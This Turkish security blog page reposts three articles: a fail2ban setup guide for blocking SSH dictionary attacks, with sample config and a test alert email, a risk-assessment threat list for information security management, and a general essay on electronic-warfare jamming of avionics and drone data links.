SSH’ın varsayılan port numarası 22’dir. Bu değer /etc/ssh/sshd_config dosyasindan değiştirilebilir. Fakat çoğu sistem yöneticisinin bunu değiştirmediği ne yazık ki bir gerçektir. Üstelik root kullanıcısının SSH bağlantısı da çoğu sistemde engellenmemiştir.

Görüleceği üzere bilgisayar korsanının yapması gereken işlem port 22'ye root kullanıcı adını kullanarak sözlük atağıyla (dictionary attack)   farklı şifreleri deneyip saldırmaktan ibarettir. Çoğu zaman bilgisayar korsanı ele geçirilmiş makineler ile saldırdığından izinin bulunması hayli güçleşmektedir. Bu durumda atağı önleyip, cezanın otomatik olarak sizin makineniz tarafından verilmesi büyük bir önem kazanmaktadır.

Neden Fail2ban?

Fail2ban harici başka programlarda log dosyalarını analiz edip hücum eden  makineleri yasaklayabilir. Fakat Fail2ban’ın bu programlar arasından aşağıdaki tüm özelliklere sahip olması ile sıyrılabilmektedir.

·         İstemci/sunucu

·         Multithreaded

·         Tarih/zaman dilimini otomatik tanıma

·         Logpath opsiyonunda wildcard desteği

·         Çoklu servis desteği (sshd, apache, qmail, proftpd, sasl)

·         Birçok önlem alma şekli (iptables, tcp-wrapper, shorewall, e-mail ile bildirim, etc)

Kurulum

Kurulum  Ubuntu 8.10 işletim sistemi ile gerçekleştirilmiş olmakla beraber diğer Linux versiyonlarındaki kurulum aşamaları oldukça benzerdir.

Aşağıdaki komut fail2ban programını kuracaktir.

sudo apt-get install fail2ban

Şimdi sıra gerekli konfigurasyonları yapmakta. Konfigurasyon dosyları /etc/fail2ban klasörünün altında bulunmaktadır.

Jail.conf dosyasına bir göz atalım. Burada geliştiricinin uyarısını dikkate alıp bu dosyayı değiştirmeyelim. Bunun yerine tüm değişiklikleri /etc/fail2ban/jail.local dosyasında yapalım.

Bunun için jail.conf  dosyasını aşağıdaki komut ile jail.local dosyasına taşıyalım:

sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

Ayarlar

Eğer jail.local dosyasına bakarsanız bir çok opsiyon görürsünüz. Bu opsiyonları birer birer ele alalim:

enabled

Bölümün aktif edilip edilmediğini tanımlar. Olası değerler 'true' or 'false'.

Filter

Hapis (jail) tarafından eşleşmeleri bulmak için kullanılan filtrenin (filter) ismi.

Bu ‘/etc/fail2ban/filter.d’ klasöründe var olan dosya ismine denk gelir. ( .conf uzantisiz)

Örnegin ‘filter=sshd’ /etc/fail2ban/filter.d/sshd.conf' dosyasına karşılık gelir.

action

Filtremiz bir eşitliği yakaladığı vakit hangi etkinliği yapacağını belirtir.

logpath

Filtremizin hangi log dosyasına bakacağını tanımlar.

ignoreip

Bu opsiyon ayarlandığında ne kadar başarısız login girişimi olursa olsun bunlar yok sayılıp IP'ye ceza kesilmiyecek yani ban’lanmıyacaktır.

maxretry

IP'ye ceza kesimi için ne kadar hatalı giriş yapma hakkı olduğunu belirler. Eğer bu sayıyı 5'e ayarlarsanız altıncı başarısız login girişiminde bulunan IP'ler cezalandırılacak yani bloklanacaktır.

bantime

IP'nin kaç saniye bloke kalacağını belirler.

destmail

Bu opsiyon her hangi bir bloklanma olayında kime e-posta gönderileceğini belirler.

banaction

Bu değişken ile IP hakkında ne türlü bir ceza kesimi olacağına karar verilir.

Bu opsiyon,  '/etc/fail2ban/action.d' klasöründe yer alan dosyanın '.conf' uzantısız halini tanımlar. Örnegin, 'action = iptables-allports', '/etc/fail2ban/action.d/iptables-allports.conf' dosyasına karşılık gelir.

Protocol

Standart olarak engellenecek protokoller varsa burada belirtilir.

Vereceğimiz örnekte, fail2ban’in saldırgan makinelerin IP’lerini bloke edip bilgi@example.com Bu mail adresi spam botlara karşı korumalıdır, görebilmek için Javascript açık olmalıdır adresine whois raporunu içeren e-posta göndermesini sağlıyacağız.

Bu IP adresinin 5 dakikalığına bloke edilmesini istemekteyiz:

[DEFAULT]

 

bantime  = 600

destemail = bilgi@example.com Bu mail adresi spam botlara karşı korumalıdır, görebilmek için Javascript açık olmalıdır

action = %(action_mw1)s

 

[ssh]


enabled = true

port    = ssh

filter  = sshd

logpath  = /var/log/auth.log

maxretry = 5

Şimdi fail2ban programını yeniden başlatalım:

sudo /etc/init.d/fail2ban restart

Başlangıçta jail.conf adlı dosyada sadece ssh bölümü aktif edilmiştir.

Bu fail2ban programının yalnızca  /var/log/auth.log dosyasına bakıp saldırgan IP’leri bloke edecek anlamına gelmektedir. Eğer web, mail, dns ya da ftp sunucularına saldıran IP’leri de engellemek istiyorsak, ‘enabled’ değerini o bölümler için de ayarlamamız ve gerekli filtreleri aktif hale getirmemiz lazımdır.

Test

Hazırladığımız test ortamında iki tane makine mevcuttur: Saldırgan makine ve bizim sunucumuz

Saldırgan makinenin IP’si: 123.45.67.89

Sunucumuzun IP’si: 98.76.54.32

Yönetici e-posta adresi: bilgi@example.com Bu mail adresi spam botlara karşı korumalıdır, görebilmek için Javascript açık olmalıdır

Saldırgan makineden 5 tane başarısız login girişimi yaptıktan sonar e-postamızı kontrol edelim:

From fail2ban@ITSecurity  Thu Jul 16 04:59:24 2009

Subject: [Fail2Ban] ssh: banned 123.45.67.89

Hi,

The ip 123.45.67.89 has just been banned by Fail2Ban after

5 attempts against ssh.

Here are more information about 123.45.67.89:

{whois info}

Lines containing IP:123.45.67.89 in /var/log/auth.log

Jul 16 04:59:16 example.com sshd[10390]: Failed password for root from 123.45.67.89 port 46023 ssh2

Jul 16 04:59:18 example.com sshd[10390]: Failed password for root from 123.45.67.89 port 46023 ssh2

Jul 16 04:59:20 example.com sshd[10390]: Failed password for root from 123.45.67.89 port 46023 ssh2

Jul 16 04:59:21 example.comsshd[10394]: reverse mapping checking getaddrinfo for 123.45.67.89.example.com [123.45.67.89] failed – POSSIBLE BREAK-IN ATTEMPT!

Jul 16 04:59:22 example.com sshd[10394]: Failed password for root from 123.45.67.89 port 46024 ssh2

Regards,

Fail2Ban

Burada fail2ban bize engellediği IP’yi whois bilgisiyle beraber göndermiştir. Whois bilgisi saldırgan kullanıcıyı organizasyona ihbar etmemiz bakımından oldukça önemlidir. Çoğu şirket gerekli yaptırımları uygulamakta ve kullanıcıyı uyarmaktadir.

Sonuç

Fail2ban, Linux sistemleri daha güvenli hale getiren oldukça iyi bir programdir. Bu teknik yazıda fail2ban programını kendi ihtiyaçlarımız doğrultusunda nasıl kurabileceğimizi ögrendik. Fail2ban, saldırgan IP'leri bloke edebilir ve whois bilgisini e-posta yoluyla bize ulaştırabilir. Böylelikle saldırganı kendi ISP şirketine şikayet edebilir ve  böylelikle gelecekte aynı IP’den gelebilecek olası atakların önüne geçebiliriz.

İsmail Güneydaş

http://www.bilgiguvenligi.gov.tr/linux-guvenligi/fail2ban-ile-linux-sistemlerini-koruma.html

Yazar: ceyhun çamlı Security | Etiketler: , , , , , , , , ,

Bilgi Güvenliği Yönetim Sistemi – Tehditler

23 Şub
2010
Yorum
Yap

Bilgi Güvenliği Yönetim süreci farkındalığına sahip olan kurumlar, bilgi teknolojilerinde kullanılan varlıklarını belirlemek (Envanter çalışması v.b.), kategorize etmek (finansal açıdan, iş süreçlerindeki önemi açısından v.b. ) durumundadır. Bu aşamadan sonra, bu varlıkları  tehditler ile  ilişkilendirmek gerekir. Ayrıca tehditlerin olasılık oranı ölçülmelidir. Bu yönetim sistemi,  risk değerlendirmesi çalışmasının en önemli bölümünü oluşturur. Çalışma sonucunda hangi bilgi teknoloji varlığı, hangi risklere karşı korunmalıdır sonucu ortaya çıkacaktır.

Bilgi Güvenliği kapısındaki bu paylaşım ortamında, Bilgi Güvenliği Yönetim Sistemi proje grupları aşağıdaki tehdit listesini geliştirebilir veya bu hali ile kullanabilirler.

 

TEHDİT LİSTESİ
İş ile ilgili tehditler: Finansal Zayıflıklar, İflas, Market Problemleri
Log Dosyalarının yanlışlıkla yada kasten değiştirilmesi
Yedekleme Medyalarında bozulma
Gizli Kanallardan Bilgi Sızdırılması
Kaza veya arızalardan oluşabilecek hasar
Kablo hasarları
Disipline edilmemiş aksiyonlar veya tehditin farkedilemesi
Hizmet kesintisi tehdidi
Ekipmanın tahrip edilmesi tehdidi
Gizli Bilginin Ortaya Çıkması
Şifreleme anahtarının ele geçirilmesi
Bilginin ele geçirilmesi
Tozlanma, kirlenme
Çevresel kirlilikten (gürültü, haberleşme dahil) etkilenme
Çevresel felaketler
Güvenlik politikası içerisinde hatalar ve unutmalar
Destek servislerinin kesintisi
Yangın
Su taşması, su basması
Kötü niyetle istifade (Fraud)
Hardware arızası
Rutubet ve aşırı sıcaklık
Kanıt toplanmasının sağlanamaması
Hatalı bilgi girişi
Hatalı bilgi çıkışı
Şifreleme anahtarının/algoritmasının yetersiz duzeyde olması
Kriptografi (Şifreleme ) politikası eksikliği
Bilgi alışverişindeki yetersiz anlaşmalar
Bilginin sınıfılandırılması hatası
Kaza/Arıza bilgilendirme eksikliği
Kaza/Arıza yönetiminin ele alınışında zayıflıklar
Veri medyalarının elden çıkarılması sırasında güvenlik eksikliği
Yetersiz ve test edilmemiş veri yedekleri
Yetersiz Güvenlik Yönetimi Önlemleri
İş aktivitelerinin Kesintisi
İş Sürekliliği Plan Zayıflıklıkları, Prosedürel ve Yönetimsel Eksiklikler
Çalışanın bil güv. farkındalığında zayıflık
Arıza/Kaza bildirimlerinde çalışanlarda farkındalık eksikliği
Bilgi Kaybı
Hizmet Kaybı
Kötü Niyetli Yazılımlar (Virus, Trojan, worm v.b.)
Yanlış ve yeniden yönlendirilen mesajlar (re-route, mis)
Yanlış yere dial edilme, yanlış yere faks gönderme
Audit veya sistem tool'larının yanlış kullanılması
Bilgi işlem olanaklarının yetkisiz veya yanlış kullanımı
Sistem geliştirmede karışık ve anlaşılmayan testler
Yasal düzenlemelerle uyumsuzluk
Güvenlik kontrolleri ile uyumsuzluk
Operasyonel zorluklar, tedarik zincirinde eksiklik, yoğun işgücü
Unutulmuş erişim hakları
Gizli dinleme
Fiziksel müdahele
Güç sağlayıcı, klima arızaları, elektiriksel anaomaliler
Kuruma ait bilgilerin özel amaçlarla kullanımı
Bilgi işlem süreç hataları
Onaylanmamış doğru olmayan bilginin yayınlanması
İnkar
Internet, email, elektronik ticaret riskleri
Teleworking (tele satış) riskleri
Çalışanın güvenlik ihlaleri
Dış kaynakla ilgili güvenlik ihlaleri (destek firmaları)
Güvenlik politikası ile ilgili ihlaller
İştirakler, 3.parti kuruluşların yönetimi ile ilgili güvenlik ihlalleri
Sistem hataları
Bilgi hırsızlığı
Ekipman ve medya hırsızlığı
Onaylanmamış ve test edillmemil bilgi sistem değişiklikleri
Bilgisayara yetkisiz erişim
Ekipmana yetkisiz erişim
Bilgiye yetkisiz erişim
Mobil Ekipmana yetkisiz erişim
Network ve network servislerine yetkisiz erişim
Taşıma sırasında yedekleme medyasına gizli ulaşım veya kopyalama
Yazılım kaynak kitaplığına yetkisiz erişim
Sistem dökümanlarına yetkisiz erişim
Mesajların değiştirilmesi veya mesajlara  yetkisiz erişim
Bilgi Sistem süreçlerine  yetkisiz erişim
Yazılım lisans bilgilerini yetkisiz kopyalama
Yetkisiz yazılım kurma veya yazılımda değişiklik
Yetkisiz olduğu halde bilgiyi değiştirme
Yetkisiz fiziksel erişim
Yetkisiz olduğu halde medyanın veya yazılımın silinmesi
Bilgiye ulaşılamama durumu
Bilgi işlem süreçlerine ulaşılamama durumu
Personele ulaşılamama durumu
Kaynaklara ulaşılamama
Servizlere ulaşılamama
Sorumlulukların yanlış kişiye aktarılması veya kaldırılamaması
İşletim ortamında kontol dışı değişiklikler
Zayıf gözlem nedeniyle tespit edilemeyen güvenlik zaafları
Uygun olmayan kimlik tanıma mekanizması (authenticate)

Kullanıcı hataları

Ersun Bayraktaroğlu

http://www.bilgiguvenligi.gov.tr/teknik-yazilar-kategorisi/bilgi-guvenligi-yonetim-sistemi-tehditler.html
Yazar: ceyhun çamlı Security |

Ağ Merkezli Savaşta, Aviyonik Sistemleri Bulandırma Saldırıları

22 Şub
2010
Yorum
Yap

Yaşamın her alanında, ağlar (GSM-GPS-İnternet-Uydu vb.) ile sarılmış olarak dünyanın her yerinden, izlenir, gözlenir hale geliyoruz. İzlenen, gözlenen kara, deniz, hava ve uzaydan toplanan veriler, karar destek sistemlerini beslemek için, sınıflandırıp tekrar yeni bilgiler elde etmek, beraberin de geleceği tahmin etme, hatta savaşların sonucunu kestirme gibi işlere yarıyor.

İşte bu temelden hareketle, ağdan toplanan veriyle, ağ merkezli savaş, Komuta, Kontrol, Muhabere, Bilgisayar, İstihbarat, Gözetleme, Keşif kabiliyeti eş zamanlı olarak mümkün hale geliyor. C4ISR (Command, Control, Communications, Computers, Intelligence, Surveillance, Reconnaissance)

Ağ Merkezli Savaş; Hava, Deniz, Kara, Uzay kuvvetlerinin eş güdüm içerisinde, değişen şartlara göre taktik geliştirebildiği ve ağ merkezli olarak, karar destek sistemine tüm savaş değişkenlerine ait bilgileri toplayıp, aktardığı bir yapı olarak karşımıza çıkıyor.

Klasik anlamda, komuta-kontrol kademesinin hantal yapısı, taktik bir üstünlük olarak ağ merkezli savaşla aşılmış oluyor.

Cephelerde, savaşan ve gözlem yapan tüm unsurlardan algılayıcılarla toplanan değişken veriler, taktik veri linkleriyle savaşın komuta-kontrol merkezine akıyor. Böylece, Komuta, Kontrol, Muhabere, Bilgisayar, İstihbarat, Gözetleme, Keşif kabiliyetleri eş zamanlı kullanılmış oluyor.

İşte tam da bu bölümde, havadan yapılan gözlem, saldırı ve savunma kabiliyeti, sonucu belirleyen önemli bir kuvvet çarpanı olarak karşımıza çıkıyor.

Bu amaçla geliştirilen uçaklar ve insansız hava araçları (İHA) günümüz savaşlarında, bilginin toplanması, düşmanın uzaktan görülmesi, yer ve konum bilgilerinin paylaşılması ve komuta kademesinin karar destek sistemleri için en önemli unsurdur.

Havacılık elektroniği olarak tanımlanan (Aviyonik) sistemler; uçaklar, insansız hava araçları, füzeler, roketler için vazgeçilemeyecek derecede önemli.

Seyr-ü Sefer Sistemleri, Haberleşme Sistemleri, Kokpit Göstergeleri ve Kontrolleri olarak özetleyebileceğimiz, Aviyonik Sistemler topladıkları verilerle, hava aracının komuta-kontrolünü sağlayarak, verilen taktik görevi yerine getirmeye çalışır.

Aviyonik Sistemlerin kullanıldığı savaşların, en zayıf tarafı, elektronik savaş taktiği olarak bulandırma-karıştırma saldırılarına açık olmalarıdır.

Elektronik Savaş tarihine kısaca bakarsak,

1905 yılında Rus-Japon savaşında telsizin kullanılması sonucu savaşın kaderinin Japonlar lehine değişmesi,

1935 yılında radarın İngilizler tarafından geliştirilmesi, 2. Dünya Savaşı'nda Almanlar'ın Bismarck adlı savaş gemisinde radar algılama lambası olarak Metox'ları kullanmaları ve İngilizlerin Magnetron kullanmaları ve Alman denizaltılarını tespit edip imha etmeleri,

Elektronik karıştırmanın, tarihte ilk kez harekat planlarının bir parçası olarak uygulanması Normandiya Çıkarması'dır. Müttefikler bu harekatı gizlemek için detaylı bir aldatma ve karıştırma planı geliştirerek Almanlar'ı, çıkartmanın Calais civarına yapılacağına inandırmaya çalıştılar. Dover civarındaki telsiz haberleşmesini artırarak, Almanlar'ı kuvvetlerinin bu civarda yoğunlaştığına inandırdılar. Calais civarındaki radarları aldatarak, buraya doğru bir donanmanın ve uçakların yaklaştıklarının sanılmasını sağladılar. Normandiya civarında bulunan radarları karıştırarak esas o tarafa doğru olan çıkartmayı gizlediler. Böylelikle Almanlar'ın durumu önceden fark edip stratejik ihtiyatlarını bölgeye kaydırmadan önce, Müttefik Kuvvetler kıyı başı üstünlüğünü ele geçirerek 2. Dünya Savaşının bu en büyük harekatını başarıyla gerçekleştirdiler.

Soğuk Savaş döneminde, Sovyetler Birliği Avrupadan kendi topraklarına propaganda yayını yapan BBC ve Amerikanın Sesi radyolarını karıştırmak için , 1500 kadar radyo istasyonu ile 1954 yılına kadar yayın yapar.

Yeni Rus radarları hakkında hiçbir şey bilmediğini fark eden Batı, 1949 yılından itibaren Ruslara karşı Elektronik İstihbarat (ELINT) faaliyetlerine başlar. Etkili bir ELINT faaliyeti için karşı tarafın yeteneklerinin tespiti gerektiğinden bu dönemde bloklar arasında karşılıklı olarak hava sahası ihlallerinin arttığı görülür.

Soğuk Savaş döneminde ortaya çıkan diğer önemli elektronik savaş / SIGINT uygulamaları arasında; SIGINT Merkezlerinin (örneğin İran'da) kurulması, Uçaklarda bulunan TACAN (Tactical Air Navigation) veya ADF (Automatic Direction Finding) adlı seyrüsefer sistemlerinin Elektronik Aldatma ile yanıltılarak uçakların yanlış meydanlara indirilmesi dikkat çekmektedir. Bu konuda özellikle Ruslar çok başarılı olmuştur.

Vietnam savaşı, Arap-İsrail savaşları, İngiltere-Arjantin Falkland savaşları, Bekaa Vadisi savaşı, Körfez savaşı ve Irak işgalini bulandırma-karıştırma taktiklerinin yoğun başvurulduğu elektronik savaşlara örnek verebiliriz.

Ağ merkezli savaşlarda, uçak ve insansız hava araçlarına ait taktik veri linkleri önemli ölçüde, Aviyonik Sistemlerin topladığı komuta-kontrol verilerini taşır.

Taktik veri linklerine yapılacak olan protokol bulandırma saldırıları ile savaşın komuta-kontrolü için gerekli olan bilgi, güvenli olmaktan çıkarak, kuvvet çarpanı olan uçak ve insansız hava aracını etkisiz kılabilir.

Bir başka bulandırma saldırısı da, doğrudan Aviyonik sistemlere RF ile yapılarak, uçak ve insansız hava aracının düşürülmesiyle sonuçlanabilir.

Askeri üslerde bulunan radar ve yardımcı donanımlarla, insansız hava aracı ve uçaklarda bulanan kızıl ötesi (ileri bakışlı hedef tespit ve teşhis) FLIR sistemleri ve yapay açılı radar (SAR) bulandırılabilir, karıştırılabilir.

Seyr-ü Sefer Sistemleri, Haberleşme Sistemleri, Kokpit Göstergeleri ve Uçuş Kontrol Sistemleri, Bilgi Kontrol Sistemleri olarak özetlenebilecek olan Aviyonik Sistemler, RF ile bulandırma-karıştırma saldırıları sonucu çalışamaz veya yanlış ölçüm yapar hale gelebilir.

Böyle bir durumda, yükseklik ölçer, (Radio Altimetre), radyo haberleşmesi gibi daha birçok kritik görev , İHA ve uçaklarda  sağlanamadığı için, aviyonik sistemleri kör edilmiş bir hava aracının, ağ merkezli savaşta yer alması mümkün olmaz.

Cenk Ceylan

http://www.bilgiguvenligi.gov.tr/siber-savunma/ag-merkezli-savasta-aviyonik-sistemleri-bulandirma-saldirilari.html

Yazar: ceyhun çamlı Security | Etiketler: , , , , , , , , , , ,
« Önceki Yazılar